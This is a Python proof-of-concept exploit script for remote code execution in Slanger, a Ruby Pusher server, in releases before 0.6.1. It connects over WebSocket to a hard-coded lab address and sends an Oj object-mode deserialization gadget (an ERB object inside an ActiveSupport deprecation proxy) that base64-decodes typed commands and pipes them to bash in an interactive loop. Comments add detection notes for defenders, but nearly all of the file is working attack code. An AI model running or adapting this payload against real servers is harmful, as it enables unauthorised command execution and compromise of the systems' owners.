slanger-exploit.py
from websocket import create_connection
import base64
import re
# Proof-of-concept client for the remote code execution issue that the banner
# below attributes to Slanger releases before 0.6.1. Per that banner, 0.6.1 is
# the first unaffected release.
#
# Reviewer notes for defenders:
#   * Every frame sent from the prompt loop is JSON whose objects carry a "^o"
#     key. That key is the object marker used by Ruby's Oj parser in object
#     mode, which is presumably how the server decodes client frames (confirm
#     against the Slanger source). Client-supplied JSON should never be parsed
#     in a mode that can instantiate arbitrary classes.
#   * Inbound WebSocket text frames containing "^o" together with class names
#     such as ERB or ActiveSupport::Deprecation are a usable detection signal.
#   * The only credential involved is the app key in the URL, which Pusher
#     clients treat as public, so exposure should be assumed for any reachable
#     instance of an affected version.

# Target endpoint and Pusher app key; both are lab values hard-coded by the author.
remote = "ws://172.18.0.3:8080"
app_key = "765ec374ae0a69f4ce44"

# Loop-invariant frame template; "command_replace" is substituted per command.
# The object graph wraps an ERB instance in a deprecation proxy whose "method"
# is ":result", and the ERB "src" is a system() call that base64-decodes its
# argument and pipes it to bash.
FRAME_TEMPLATE = '''{"^o":"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy","instance":{"^o":"ERB","src":"system('bash','-c','{echo,command_replace}|{base64,-d}|{bash,-i}')","lineno":1337},"method":":result","deprecator":{"^o":"ActiveSupport::Deprecation","silenced":true}}'''

print("\nRCE in Slanger, a Ruby implementation of Pusher < 0.6.1\n")
print("[+] Checking if ws available =>", end=' ')

# Open the Pusher-protocol socket and send a harmless frame to read the greeting.
endpoint = f"{remote}/app/{app_key}?protocol=7&client=js&version=3.1.0&flash=false"
ws = create_connection(endpoint)
ws.send("{'hello':'world'}")
result = ws.recv()

# The check is informational only: the prompt loop starts either way.
if re.search('connection_established', result):
    print("\033[92mOK\033[0m")
else:
    print("ws service not working")

while True:
    try:
        command = input("command (\033[92mnot reflected\033[0m)> ")
        if command == "exit":
            print("Exiting...")
            break

        # Base64 keeps shell metacharacters out of the JSON string. Any '/' in
        # the encoded text is then replaced with '+', exactly as the original
        # script does.
        encoded = base64.b64encode(command.encode('utf-8')).decode('utf-8')
        encoded = encoded.replace('/', '+')

        print("[+] Executing command =>", end=' ')
        frame = FRAME_TEMPLATE.replace("command_replace", encoded)
        print(frame)
        ws.send(frame)

        # The reply is the server's protocol response, not the command output
        # (the prompt says "not reflected").
        result = ws.recv()
        print("\n", result, "\n")
    except KeyboardInterrupt:
        print("Exiting...")
        break

ws.close()